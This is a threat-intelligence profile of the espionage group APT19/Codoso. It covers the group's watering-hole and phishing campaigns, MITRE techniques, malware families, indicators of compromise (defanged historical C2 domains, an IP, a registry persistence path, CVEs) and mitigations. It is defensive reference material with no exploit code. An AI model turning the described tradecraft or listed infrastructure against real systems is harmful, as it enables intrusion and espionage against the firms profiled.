analyst@ nohacky:~/threat-actors $
cat/ threat-actors/ apt19-codoso
analyst@nohacky:~/apt19-codoso.html
active profile
type Nation-State
threat_level Critical
status Active
origin China — contractor-linked (assessed MSS-adjacent)
last_updated 2026-03-26
CS
apt19-codoso

APT19 / Codoso

also known as: C0d0so0 Codoso Team Sunshop Group Bronze Firestone Checkered Typhoon Chlorine Deep Panda (overlap disputed) Shell Crew (overlap) G0073

A Chinese espionage group assessed to operate through freelance contractors with state sponsorship, targeting legal, financial, and defense sectors with unusual precision. Notable for a 2015 watering hole attack via Forbes.com using chained zero-days, and a 2017 phishing campaign targeting seven law and investment firms simultaneously. Blends custom Derusbi backdoors with commodity tools like Cobalt Strike and Empire in a way that deliberately complicates attribution — and has been active since at least 2010 when it compromised the Nobel Peace Prize website to target Chinese dissidents.

attributed origin China (freelance contractor model)
suspected sponsor Chinese state — assessed MSS-adjacent; freelancer-based operations
first observed 2010
primary motivation Economic Espionage, Political Intelligence, IP Theft
primary targets Legal Services, Finance, Defense, High-Tech, Dissidents
named campaigns Nobel, Forbes, Dept of Labor, Law Firms 2017
mitre att&ck group G0073
target regions USA (primary), global legal and financial sector
threat level Critical — active, zero-day history

Overview

APT19 — tracked as Codoso and C0d0so0 by Palo Alto Networks and iSIGHT Partners (acquired by FireEye in 2017), Sunshop Group by FireEye, Bronze Firestone by SecureWorks, and Checkered Typhoon (also Chlorine) by Microsoft — is a Chinese cyber espionage group that has operated since at least 2010. Note that Microsoft's name SCANDIUM refers to APT18 (Dynamite Panda / Wekby), a separate group — the two are occasionally confused in open-source reporting. APT19 is distinct from the predominantly PLA-affiliated groups that dominate China's documented APT landscape; it is assessed to operate through a freelance contractor model with some level of Chinese state sponsorship — making it MSS-adjacent rather than a directly embedded military or intelligence unit. This structure has tactical implications: the group demonstrates more flexible, entrepreneurial operational behavior than rigidly structured PLA units, blending custom malware with commodity offensive security tools in a way that makes clean attribution genuinely difficult.

APT19's earliest documented activity is a 2010 compromise of the Nobel Peace Prize website. Shortly after the 2010 Nobel Peace Prize was awarded to Chinese dissident Liu Xiaobo — a decision that infuriated the Chinese government — APT19 compromised the Nobel committee's web properties and served zero-day exploits to visitors via a Firefox browser vulnerability. The targeting was narrow and deliberate: the attackers were not seeking broad infection but intelligence on the individuals and organizations monitoring or celebrating the dissident's recognition. This political targeting alongside economic espionage — a dual mandate — has characterized the group ever since.

APT19 came to wide industry attention in late 2014 when iSIGHT Partners and Invincea documented that the group had compromised Forbes.com's "Thought of the Day" widget — a Flash-based element loaded by millions of visitors — and used it as a delivery platform for a chained zero-day attack that exploited both an Adobe Flash vulnerability and a Microsoft ASLR bypass in Internet Explorer. The attack was selective: despite Forbes being one of the 60 most-visited websites in the world at the time, the exploit was served only to visitors fitting a specific target profile, primarily in the defense sector and financial services. Attackers were not indiscriminately infecting visitors — they were hunting specific organizations whose personnel happened to visit Forbes.

The group's 2017 law firm campaign — documented by Mandiant in June 2017 — demonstrated both longevity and adaptability. APT19 targeted seven law and investment firms with three sequentially deployed techniques: RTF documents exploiting CVE-2017-0199, macro-enabled Excel (XLSM) documents that bypassed application whitelisting, and Cobalt Strike Beacon payloads. The campaign reflected a group that monitors defensive technology and pivots delivery mechanisms when initial approaches are detected — cycling through three distinct techniques over a single month-long operation.

attribution note

The relationship between APT19 and Deep Panda is genuinely contested. MITRE ATT&CK notes that some analysts treat them as the same group; others — including iSIGHT — assessed them as distinct groups that share tools (particularly Derusbi) and may share resources but operate independently. The freelancer model means the same individual operators or tool developers may appear in both activity clusters. This profile treats APT19 as a distinct operational cluster while noting that tool overlap with Deep Panda is documented and real. No DOJ indictment has been filed against specific APT19 members.

Target Profile

APT19's targeting is defined by a striking interest in the intermediaries of sensitive information — law firms, investment banks, and advisors who hold privileged access to the proprietary data of primary targets — rather than attacking those primary targets directly. This represents a sophisticated intelligence tradecraft insight: it is often easier and more productive to compromise the lawyer reviewing an M&A deal than to breach the company being acquired. The group complements this with traditional defense and technology IP theft and a consistent political mandate targeting Chinese dissidents.

  • Legal Services: The highest-profile documented targeting sector. Law firms handling mergers and acquisitions, trade secret litigation, government contracts, and intellectual property work hold enormous quantities of sensitive client data — often including the proprietary information of companies that would otherwise be very difficult to breach directly. APT19's 2017 campaign simultaneously targeted seven law and investment firms, reflecting a systematic approach to this supply-chain espionage model.
  • Financial and Investment Services: Investment banks, hedge funds, private equity firms, and economic advisory organizations are targeted for M&A intelligence, market-moving proprietary analysis, and strategic economic forecasting. Mandiant noted prior observations of APT19 stealing data from law and investment firms for competitive economic purposes, suggesting stolen intelligence is used to advantage Chinese state-owned enterprises in competitive negotiations and transactions.
  • Defense and Aerospace: Defense contractors, defense industry consultants, and aerospace firms are consistently targeted for weapons system specifications, procurement intelligence, and technology blueprints. The 2014 Forbes watering hole specifically targeted defense sector visitors — consistent with Chinese state interest in advancing PLA capabilities through stolen Western defense research.
  • High Technology and Telecommunications: APT19's 2016 campaign documented by Palo Alto Unit 42 targeted telecommunications, high-tech, and manufacturing organizations. Technology firms are targeted both for their own IP and as access vectors to clients and partners in higher-value sectors.
  • Political Dissidents and Think Tanks: The Nobel Peace Prize compromise and Department of Labor breach both reflect a political intelligence mandate alongside economic espionage — consistent with the MSS's responsibility for monitoring Chinese diaspora, dissidents, and foreign organizations that advocate on China-sensitive issues. Global think tanks working on China policy, Taiwan, Tibet, and Xinjiang are documented Codoso targets.
  • Energy, Pharmaceutical, and Manufacturing: Broader economic espionage targets consistent with Chinese Five Year Plan industrial priorities, documented across multiple APT19 campaign generations.

Tactics, Techniques & Procedures

APT19's technique footprint spans the full attack lifecycle. A notable characteristic is the group's deliberate blending of custom and commodity tools — pairing the bespoke Derusbi backdoor with widely available offensive security frameworks like Cobalt Strike and Empire. This makes individual tool detections less reliable as attribution anchors and forces defenders toward behavioral detection. The group also demonstrates a willingness to pivot delivery mechanisms mid-campaign when initial approaches fail, cycling through three distinct techniques in its 2017 law firm operation within a single month.

mitre id technique description
T1189 Drive-by Compromise (Watering Hole) APT19's signature initial access technique, documented in campaigns from 2010 through 2015. The group compromises high-traffic, reputable websites that its target audience is likely to visit — the Nobel Peace Prize site (2010, targeting dissident-adjacent visitors), the U.S. Department of Labor (2013, targeting workers' compensation and government benefit recipients), and Forbes.com (2014, targeting financial services and defense sector professionals). The group then selectively delivers exploits only to visitors matching a specific target profile, rather than broadly infecting all visitors — demonstrating intelligence on who reads which sites.
T1566.001 Spear-Phishing Attachment Used extensively in post-2015 campaigns when watering hole infrastructure became harder to maintain undetected. The 2017 law firm campaign used RTF documents (exploiting CVE-2017-0199) and macro-enabled XLSM spreadsheets. Lures impersonated legal correspondence and business-relevant documents — sophisticated enough that Mandiant published a specific advisory to law and investment firms about the campaign.
T1203 Exploitation for Client Execution The Forbes watering hole exploited a chained combination of an Adobe Flash zero-day and a Microsoft Internet Explorer ASLR bypass zero-day — two previously unknown vulnerabilities used together to defeat a key memory randomization defense. This chained zero-day approach was assessed by iSIGHT as technically sophisticated and distinct from typical criminal activity. CVE-2017-0199 (Microsoft Office HTA handler vulnerability) was used in the 2017 law firm RTF phishing campaign.
T1574.001 DLL Search Order Hijacking APT19 used a legitimate executable — in one documented case a McAfee application — to side-load a malicious DLL containing the HTTP and Port 22 Derusbi variants. This technique abuses the Windows DLL search path to cause a trusted application to load an attacker-controlled library, effectively masking the malicious process behind a signed, legitimate binary.
T1059.001 PowerShell APT19 used obfuscated PowerShell from the Empire framework, hiding the Window-Style parameter with -W Hidden to suppress visible PowerShell windows. Base64 encoding of PowerShell commands was used consistently as command obfuscation. In the 2017 XLSM campaign, Excel macro execution triggered PowerShell to download and execute subsequent stages, bypassing application whitelisting controls that allow Office macro execution.
T1055 Process Injection Derusbi uses process injection to execute within the context of a legitimate running process, reducing the forensic footprint of the backdoor and evading process-based detection tools that would flag a standalone malicious process. Campaign-specific Derusbi builds are compiled for individual operations and injected post-exploitation.
T1547.001 Registry Run Keys Derusbi establishes persistence via Registry Run keys when running without administrator privileges — writing the backdoor path under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. When administrator privileges are available, it installs as a Windows service for more robust persistence that survives standard user-level security tooling.
T1505.003 Web Shell China Chopper web shells are deployed on internet-facing web servers following exploitation, providing a persistent, lightweight command interface accessible via HTTP. Web shells require no outbound C2 connection — they receive commands via inbound HTTP requests — making them harder to detect through outbound traffic monitoring and difficult to fully eradicate if the underlying web vulnerability is not also patched.
T1071.001 Web Protocols (HTTP C2) Multiple Derusbi variants communicate over HTTP. The HTTP variant uses standard web protocol traffic to blend with normal enterprise web activity. The C0d0so0 custom backdoor also supports HTTP C2 with compressed and encoded network traffic to resist inspection. Derusbi communicates over SSL in some configurations, requiring TLS inspection to detect.
T1027.010 Command Obfuscation (Base64) PowerShell commands are Base64-encoded consistently across documented APT19 campaigns. Combined with the -W Hidden parameter to suppress visible execution windows, encoded PowerShell commands execute silently and resist pattern-based detection rules that look for plaintext PowerShell command strings.

Known Campaigns

APT19's campaign history spans from politically motivated dissident surveillance in 2010 through sustained economic espionage focused on legal and financial sectors. The group's watering hole operations show a consistent and sophisticated pattern: compromising sites of strategic audience value rather than maximum reach, then delivering exploits selectively to visitors matching an intelligence-driven target profile.

Nobel Peace Prize Website Compromise 2010

APT19's earliest documented operation. Shortly after the 2010 Nobel Peace Prize was awarded to incarcerated Chinese dissident Liu Xiaobo — a decision that prompted intense protest from the Chinese government — APT19 compromised the Nobel committee's web properties and embedded a zero-day exploit in the Firefox browser to serve malicious code to selected visitors. The targeting was narrow: the group was specifically interested in individuals and organizations monitoring, celebrating, or advocating for the dissident, consistent with a political intelligence mandate rather than purely commercial espionage. This campaign established the group's founding pattern of using trusted, high-credibility websites as selective-delivery exploit platforms rather than broad-infection malvertising.

U.S. Department of Labor Watering Hole 2013

In March 2013, CrowdStrike identified a strategic web compromise on a U.S. Department of Labor website. The compromised page redirected selected visitors to attacker infrastructure. Eight additional compromised sites were identified in the same campaign, suggesting coordinated infrastructure. The Department of Labor targeting was likely designed to reach government employees, defense industry workers, and individuals filing workers' compensation or benefit claims — consistent with a data collection effort targeting U.S. government workforce intelligence. FireEye publicly identified the group behind these watering hole operations as the Sunshop Group — the same cluster later designated APT19 — in 2013.

Forbes.com Watering Hole — Chained Zero-Days Nov 28 – Dec 1, 2014

APT19's most technically documented campaign. From November 28 to December 1, 2014, the group compromised Forbes.com's "Thought of the Day" widget — a Flash-based feature loaded by every visitor to the site — and used it as the delivery platform for a chained zero-day exploit. The Flash component exploited CVE-2014-9163 (Adobe Flash Player buffer overflow, patched December 9, 2014); the Internet Explorer component exploited CVE-2015-0071 (IE ASLR bypass, patched February 10, 2015 Patch Tuesday). Chaining both allowed attackers to defeat ASLR memory protection that would have blocked the Flash exploit alone. iSIGHT Partners described the chained zero-day as a "unicorn" in the cyber threat landscape — the best-known prior example being Stuxnet. Despite Forbes being ranked by Alexa as the 61st most popular website globally, the exploit was delivered only to visitors fitting a specific target profile — primarily defense sector firms and financial services organizations, plus Chinese dissident-adjacent groups. Invincea first detected the campaign through a defense industrial base customer who noticed unusual behavior. iSIGHT Partners attributed the campaign to Codoso Team in their February 2015 report. Forbes was notified and took immediate action on December 1 when the compromise was identified. The Derusbi malware family was used as the post-exploitation implant, with C2 infrastructure tied to a domain previously associated with Codoso operations. iSIGHT and Invincea note that malware resources written in Simplified Chinese bore a resemblance to Derusbi variants unique to Chinese cyber espionage operators.

C0d0so0 New Wave — Telecom, High-Tech, Legal 2016

Documented by Palo Alto Networks Unit 42 in January 2016. Following the Forbes exposure, APT19 returned with new custom malware variants — an HTTP variant and a Port 22 variant — that shared structural similarities with Derusbi but did not match any known malware family at the time of discovery. The group used DLL sideloading via a legitimate McAfee application to launch the malware. Newly targeted sectors included telecommunications, high technology, education, manufacturing, and legal services — an expansion from the primarily defense and finance focus of earlier campaigns. Both malware variants were compiled within days of observed attacks, consistent with per-campaign custom build procedures documented across APT19's Derusbi generations.

Law Firm Phishing Campaign — Triple-Technique 2017

Documented by Mandiant in June 2017 under the title "Privileges and Credentials: Phished at the Request of Counsel." APT19 simultaneously targeted seven law and investment firms using three sequentially deployed techniques within a single campaign window. In early May 2017, the group sent phishing emails with RTF attachments exploiting CVE-2017-0199 (a Microsoft Windows HTA handler vulnerability enabling remote code execution via malicious Office documents). Toward the end of May, APT19 switched to macro-enabled Excel (XLSM) documents — including an application whitelisting bypass technique embedded in the macros. At least one observed phishing lure delivered a Cobalt Strike Beacon payload. Mandiant could not attribute post-exploitation activity at the time of publication but noted prior observations of APT19 stealing data from law and investment firms for competitive economic purposes. The campaign demonstrated deliberate targeting of legal and financial sector supply chains and a willingness to rapidly pivot delivery mechanism when defenses respond.

Tools & Malware

APT19's toolset is deliberately mixed. Custom-built backdoors like Derusbi provide sophisticated, campaign-tailored capability; commodity frameworks like Cobalt Strike and Empire provide operational flexibility and complicate attribution. The group's access to Derusbi source code — evidenced by the deployment of modified versions immediately after previous versions were removed from compromised hosts — indicates a developer relationship with that malware family, not merely use of a shared tool.

  • Derusbi (PHOTO): APT19's primary custom backdoor, and the tool most closely associated with the group across all documented campaign generations. Modular in design — additional plugins can be loaded at runtime without a full reimplant, extending capability while minimizing the forensic footprint of the core implant. Supports file transfer, command execution, screen capture, keylogging, and network proxying. Communicates over SSL in some configurations — making it invisible to inspection tools that cannot perform TLS termination. APT19 appears to have access to Derusbi's source code, as modified versions are deployed quickly after previous versions are identified and removed. Two documented variants: HTTP variant (communicates over standard web protocol) and Port 22 variant (disguised to resemble SSH traffic).
  • Cobalt Strike Beacon: A commercial offensive security framework used by APT19 as a post-exploitation payload, first documented in the 2017 law firm campaign. Beacon provides flexible C2 over HTTP, HTTPS, DNS, or SMB; in-memory execution to avoid writing payloads to disk; and an extensible post-exploitation toolkit including credential dumping, lateral movement, and data staging. Use of a commercial tool complicates attribution — Cobalt Strike is used by dozens of threat actors globally — and requires defenders to distinguish APT19 Beacon deployments from other actors through infrastructure and behavioral correlation.
  • Empire (PowerShell Framework): An open-source PowerShell post-exploitation framework used by APT19 for command execution and persistence. APT19 concealed Empire's PowerShell invocations using the -W Hidden window style parameter and Base64 encoding for obfuscation. Empire's use is detected behaviorally via anomalous PowerShell execution patterns rather than specific signatures.
  • C0d0so0 Custom Backdoors (HTTP and Port 22 variants): Two custom malware variants documented by Palo Alto Unit 42 in 2016, structurally similar to Derusbi but sufficiently distinct to be treated as a separate family at time of discovery. Delivered via DLL sideloading through a legitimate McAfee executable. Compress and encode network traffic. Compiled campaign-specifically, with compile timestamps within days of observed deployments. The Port 22 variant is designed to masquerade as SSH traffic, complicating port-based filtering.
  • China Chopper: A minimal web shell used for persistent access on compromised internet-facing servers. Receives commands via inbound HTTP POST requests, eliminating the need for outbound C2 connections — making it invisible to outbound traffic monitoring. China Chopper's tiny code footprint (the client component is trivially small) makes it easy to plant and difficult to reliably detect through file scanning alone.
  • 9002 RAT (NAID): A Chinese RAT shared across multiple APT groups within the broader Chinese espionage ecosystem. Provides remote access for surveillance and data collection. Noted in Bronze Firestone/APT19 intrusion sets alongside Derusbi.
  • PlugX: A widely-used modular Chinese APT RAT deployed by APT19 in some campaigns, providing a plugin-extensible persistent access framework. Its prevalence across Chinese APT groups makes it a weaker attribution signal but still a contextually relevant indicator when found alongside Derusbi or other APT19-specific tooling.
  • EvilGrab RAT: A RAT enabling webcam access, file theft, and screen capture, documented in association with the APT19 / Deep Panda cluster. Provides surveillance capability beyond standard file exfiltration — collecting audio/video intelligence from compromised endpoints.
  • FormerFirstRAT: A remote access tool documented in the APT19 / Bronze Firestone intrusion set, used to maintain persistent access within compromised environments after initial staging tools have been replaced or cleaned. Provides a secondary persistence channel independent of Derusbi.
  • Fire Chili: A stealthy rootkit signed with legitimate digital certificates, documented by SecureWorks in the Bronze Firestone/APT19 intrusion set. Used to bypass detection mechanisms and maintain kernel-level access — the legitimate code signing certificate makes it significantly harder for standard security products to flag the rootkit as malicious.
  • Zuguo (Chinoxy): A backdoor documented in the Bronze Firestone toolset providing persistent remote access. Used alongside Derusbi and 9002 RAT as part of APT19's multi-implant persistence strategy, ensuring access is maintained even if one implant is identified and removed.
  • Alice's Rabbit Hole (MadHatter): A loader/dropper documented in the Bronze Firestone / APT19 intrusion set. Used as a staging tool to download and execute subsequent payloads, maintaining a separation between the delivery mechanism and the persistent implant to complicate forensic reconstruction of the full attack chain.

Indicators of Compromise

The following IOCs are drawn from Palo Alto Unit 42's C0d0so0 analysis (2016), Mandiant's law firm campaign disclosure (2017), and iSIGHT's Codoso/Forbes reporting (2015). Current APT19 infrastructure will be entirely different — behavioral indicators are the durable detection anchors.

warning

APT19 infrastructure is refreshed between campaigns. Specific domain and IP IOCs from 2014–2017 are historical reference only. Derusbi SSL C2 traffic is invisible without TLS inspection — behavioral and host-based indicators are significantly more reliable than network blocklists for this group.

indicators — behavioral and historical
technique DLL sideloading via legitimate signed executables (McAfee, Juniper VPN, ActiveX, Adobe Reader) to load malicious DLL variants (T1574.001)
technique PowerShell -W Hidden with Base64-encoded commands — Empire framework obfuscation pattern (T1059.001 + T1027.010)
technique Derusbi SSL C2 — requires TLS inspection; communicates to campaign-specific C2 infrastructure compiled days before observed deployment
cve CVE-2017-0199 — Microsoft Office HTA handler RCE (RTF phishing delivery, 2017 law firm campaign)
cve CVE-2014-9163 — Adobe Flash Player buffer overflow (Forbes watering hole, patched December 9, 2014)
cve CVE-2015-0071 — Internet Explorer ASLR bypass zero-day (Forbes watering hole, patched February 10, 2015)
domain jbossas[.]com / supermanbox[.]com (historical — C0d0so0 2016 C2, Hong Kong IP 121.54.168.230)
domain 2bunny[.]com (historical — 2017 law firm RTF delivery infrastructure)
yara FireEye FE_LEGALSTRIKE_RTF — detects 2017 law firm RTF lures exploiting CVE-2017-0199 (published June 2017)
pattern Derusbi network communication structure — unique to Chinese cyber espionage operators; per-campaign compiled variants with compile timestamps within days of deployment
persistence HKCU\Software\Microsoft\Windows\CurrentVersion\Run — Derusbi persistence when running without admin rights; Windows service installation with admin rights

Mitigation & Defense

APT19 is assessed as active. Law firms, investment banks, and professional services organizations working in M&A, trade secrets, defense contracting, and China-related advisory are the highest-risk sectors. The group's blend of custom and commodity tooling means no single detection approach is sufficient — defenders need layered controls spanning email, endpoint, network, and TLS inspection.

  • Law Firm and Professional Services Email Hardening: APT19's 2017 campaign directly targeted legal correspondence as a lure. Law firms and investment advisors should implement email sandboxing with document detonation, enforce strict macro execution policies across all Office applications (disable macros from external sources entirely, or restrict to digitally signed macros from trusted publishers), and train personnel to verify unusual document requests even when they appear to come from legitimate client or counterparty email addresses.
  • CVE-2017-0199 Patching: RTF documents exploiting this HTA handler vulnerability remain a documented APT19 delivery vehicle. Verify that MS17-023 is applied across all Windows systems and all versions of Microsoft Office. Consider disabling OLE object activation in Registry policy for environments where it has no legitimate use — many enterprises can safely block HTA execution entirely.
  • TLS Inspection: Derusbi communicates over SSL in some configurations, making it entirely invisible to network monitoring tools that do not perform TLS termination and inspection. Deploy forward proxy with TLS inspection for all outbound enterprise HTTPS traffic. This is also the most effective control for detecting Cobalt Strike Beacon's HTTPS C2 channel — a secondary APT19 tool. Certificate pinning and anomalous certificate detection can complement full TLS inspection where performance constraints apply.
  • PowerShell Constrained Language Mode and Script Block Logging: APT19's Empire framework usage relies on PowerShell execution. Enable PowerShell Script Block Logging and Module Logging across all endpoints — these controls capture executed PowerShell commands even when Base64-encoded, providing visibility into obfuscated execution. Deploy PowerShell Constrained Language Mode to limit what PowerShell can do without administrator privilege escalation.
  • DLL Sideloading Prevention: APT19 sideloads malicious DLLs through signed legitimate applications. Implement application control policies (AppLocker or Windows Defender Application Control) that whitelist specific DLL files permitted to load from application directories, alerting on DLL loads from unexpected paths. Monitor for known legitimate executables (McAfee, Juniper VPN client, Adobe Reader, Microsoft ActiveX components) spawning unexpected child processes or loading DLLs from unusual locations.
  • Watering Hole Detection: APT19 compromises legitimate, reputable websites frequented by its target audiences. Standard URL reputation blocklists are ineffective because the sites are genuinely reputable. Focus instead on behavioral detection: anomalous JavaScript execution in browser contexts, unexpected Flash plugin activity (Flash is retired — any Flash execution is now inherently suspicious), and drive-by download indicators on enterprise endpoints visiting external sites. Browser isolation solutions eliminate the watering hole vector entirely for high-risk user populations.
  • Supply Chain Awareness for Legal and Financial Services: APT19's targeting of law firms as a pathway to their clients means organizations in defense, technology, and finance should include their legal counsel in their threat model. Discuss cybersecurity requirements with law firms handling sensitive work; consider encrypting all privileged attorney-client communications at the document level; and be aware that breach of your legal advisors may result in exposure of your own proprietary information without your own systems being directly compromised.
analyst note

APT19's targeting of law firms as a supply-chain vector for reaching otherwise well-defended corporate and government clients represents a strategic intelligence insight that distinguishes it from more blunt-instrument Chinese APT groups. The 2017 simultaneous targeting of seven firms — each a custodian of privileged client data across multiple defense, financial, and technology organizations — shows a mature operational understanding of how sensitive information flows in the professional services economy. Organizations that consider themselves "not a target" because they are a service provider rather than an end-stage intelligence target should reassess: if your firm holds privileged information about entities that are APT19 targets, you are by definition also a target. This threat model extends to consultants, auditors, M&A advisors, and any professional services firm with deep access to client proprietary information in APT19's sectors of interest.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile